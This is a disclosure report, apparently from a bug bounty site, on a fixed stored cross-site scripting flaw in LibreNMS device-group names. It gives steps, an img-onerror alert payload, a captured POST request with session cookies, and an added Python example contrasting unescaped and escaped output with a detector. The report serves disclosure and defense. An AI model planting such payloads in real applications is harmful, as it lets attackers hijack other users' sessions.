librenms alert-rules Stored XSS in librenms/librenms

Valid

Reported on

Apr 13th 2022


Description

1. Go to http://[SERVER]/device-group and create a new device group.

2. Enter the following XSS payload in the [Name] parameter and save:
[<img src=x onerror=alert(1);>]
(screenshot: payload 1)

3. Go to http://[SERVER]/alert-rules and add a rule. You can choose the device group that contains the XSS payload.
(screenshot: payload 2)

4. Save and return to http://[SERVER]/alert-rules.
(screenshot: payload 3)

5. The JavaScript executes.
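Added example, not LibreNMS code and not part of the report: it renders a stored group name into an option the way the steps above describe, once unescaped and once HTML-escaped, and parses each result to show which one yields an img tag with an onerror handler. `flag_suspicious_names` and the sample group names are constructed for this example.

```python
# Added example (not LibreNMS code): the stored-XSS pattern from the report
# beside its hardened form, plus a parser-based check for stored names.
import html
from html.parser import HTMLParser

PAYLOAD = "<img src=x onerror=alert(1);>"  # payload from the report


class TagFinder(HTMLParser):
    """Records every tag, and every on* event-handler attribute, a fragment produces."""

    def __init__(self):
        super().__init__()
        self.tags = []
        self.handlers = []

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)
        self.handlers += [a for a, _ in attrs if a.lower().startswith("on")]


def parse_markup(fragment):
    """Return (tags, event_handlers) that a browser would see in the fragment."""
    p = TagFinder()
    p.feed(fragment)
    p.close()
    return p.tags, p.handlers


def option_unsafe(group_id, name):
    # Vulnerable pattern: the stored group name is concatenated into HTML verbatim,
    # so a name like PAYLOAD becomes a live <img> element with an onerror handler.
    return f'<option value="{group_id}">{name}</option>'


def option_safe(group_id, name):
    # Hardened pattern: the name is HTML-escaped before it is placed in the page
    # (what Blade's {{ }} output does); the payload is then shown as text only.
    return f'<option value="{int(group_id)}">{html.escape(name, quote=True)}</option>'


def flag_suspicious_names(names):
    """Detection aid (constructed): return stored names that would parse as markup."""
    return [n for n in names if parse_markup(n)[0]]


if __name__ == "__main__":
    # Constructed sample of device group names, one carrying the report's payload.
    sample = ["Core switches", PAYLOAD, "Site A (DC-1)"]
    print(parse_markup(option_unsafe(1, PAYLOAD)))  # (['option', 'img'], ['onerror'])
    print(parse_markup(option_safe(1, PAYLOAD)))    # (['option'], [])
    print(flag_suspicious_names(sample))            # ['<img src=x onerror=alert(1);>']
```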

PCAP

POST /device-groups HTTP/1.1
Host: 192.168.0.4
Connection: keep-alive
Content-Length: 524
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://192.168.0.4
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.75 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://192.168.0.4/device-groups/create
Accept-Encoding: gzip, deflate
Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7
Cookie: XSRF-TOKEN=eyJpdiI6InQ1K1ZZMm9DZ0VPQlh4RkJLcnR3elE9PSIsInZhbHVlIjoiaERTQ3pTNmJzK3lqdzZ1TkFkejhmeW9HZXcvaWVuODVwYWZZV2QxUHNyazRYdDY2VGJRSUxoSHJIbnEySisyMUptK2dpaU1hdE1QSDREMzJwYjRDMThVVk52ejNiblh1OFNWUGlMaUUvQlhKRzlLd1Y5Z2VIbWFieWpueDhOYmIiLCJtYWMiOiI0Y2JhZDI2ZGJkNjVmMmJmZjkwZmI2NTE0NTQzZDIxYmIxNDUxZjZmZTUyOTdiMmM1YWEwN2Q0ZmQxOGVlYmExIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IllnWmx0SlpoUjR2c3Z2Z2JlVDRwWmc9PSIsInZhbHVlIjoidnN4b0VBQU1pUVB1MGtIQVlyWkVNaVBOSGtIOFc3VHVDcjdVN1RuZHhjdCtGQVV2MXltSVEybk9MaERYb01DNUhyMFNSUjVxcm9WbSttQmJqbGtMOUV5WWN6SmhBYk44TU1HN2UzZjd4eVJTZmZoYURTeGdQQzRGMHJNcEYrR3kiLCJtYWMiOiJjODA2NGU2ZDZjNTg3NjM4ZWQ2ZjgwODQ4Y2Q1ZDYyZjM3ZTkxMmIxMzc1ZDkzZWUwOGIxYmI5YWMwYTg1NjBkIiwidGFnIjoiIn0%3D

_token=lTMObTvhduJCjTDkvmk1I3u4Vuti8C0OGafrlL8J&name=%3Cimg+src%3Dy+onerror%3Dalert%281%29%3B%3E&desc=111&type=dynamic&builder_rule_0_filter=access_points.accesspoint_id&builder_rule_0_operator=equal&builder_rule_0_value_0=111&rules=%7B%22condition%22%3A%22AND%22%2C%22rules%22%3A%5B%7B%22id%22%3A%22access_points.accesspoint_id%22%2C%22field%22%3A%22access_points.accesspoint_id%22%2C%22type%22%3A%22string%22%2C%22input%22%3A%22text%22%2C%22operator%22%3A%22equal%22%2C%22value%22%3A%22111%22%7D%5D%2C%22valid%22%3Atrue%7D

Impact

It allows an attacker to circumvent the same-origin policy, which is designed to segregate different websites from each other. Cross-site scripting vulnerabilities normally allow an attacker to masquerade as a victim user, to carry out any actions that the user is able to perform, and to access any of the user's data. Because this payload is stored in the device group name, it runs for any user who views the alert-rules page. If the victim user has privileged access within the application, the attacker might be able to gain full control over all of the application's functionality and data.

We are processing your report and will contact the librenms team within 24 hours. 8 months ago
We have contacted a member of the librenms team and are waiting to hear back 8 months ago
We have sent a follow up to the librenms team. We will try again in 7 days. 7 months ago
We have sent a second follow up to the librenms team. We will try again in 10 days. 7 months ago
We have sent a third and final follow up to the librenms team. This report is now considered stale. 7 months ago
Tony Murray validated this vulnerability a month ago
dnr6419 has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
Tony Murray marked this as fixed in 22.10.0 with commit d86cbc a month ago
The fix bounty has been dropped
This vulnerability has been assigned a CVE
Tony Murray published this vulnerability 9 days ago